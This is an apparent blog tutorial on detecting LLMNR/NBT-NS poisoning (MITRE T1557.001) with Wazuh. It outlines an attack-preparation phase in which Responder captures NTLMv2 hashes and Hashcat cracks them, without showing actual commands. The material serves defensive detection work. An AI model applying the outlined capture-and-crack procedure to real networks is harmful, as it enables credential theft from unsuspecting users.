This type of attack aims to capture credentials from unsuspecting users by activating, on a private network, a service which responds to requests for non-existent resources, which are usually generated by typos or by poor configurations.


We will demonstrate how to detect "LLMNR Poisoning" attacks using Wazuh in two different ways. Based on a scenario where it is possible or not to have command execution permissions on the agent.

The following tools were used for testing:

  • Responder and Hashcat to generate the attack.
  • Wazuh 4.3.1 (or higher) for event detection.
  • Powershell and Windows Task Scheduler.



The following Mitre techniques will be analyzed:

           Subtechnique 001 - LLMNR/NBT-NS Poisoning and SMB Relay


Within the Mitre Att&ck techniques, we see T1557:


Subtechnique 001 says:

"By responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) network traffic, adversaries can fake an authorized source for name resolution to force communication with an adversary-controlled system. This activity can be used to collect or transmit authentication material (...). In some cases, when an adversary has access to a system that is on the authentication route between systems or when automated scans using credentials attempt to authenticate to an adversary-controlled system, NTLMv1/v2 hashes can be intercepted and transmitted against a target system. Additionally, adversaries can encapsulate NTLMv1/v2 hashes in various protocols, such as LDAP, SMB, MSSQL, and HTTP, to expand and use multiple services with the valid NTLM response."


Attack preparation

We will use the Responder tool to test the sub-technique, which allows us to "poison" packets from different protocols such as LLMNR, NBT-NS, and MDNS.


The credentials are stored in Responder.db:


Once the hashes are captured, we can use John or Hashcat to crack them: we take the hash and save it to the file "ntlmv2.hash" and run Hashcat: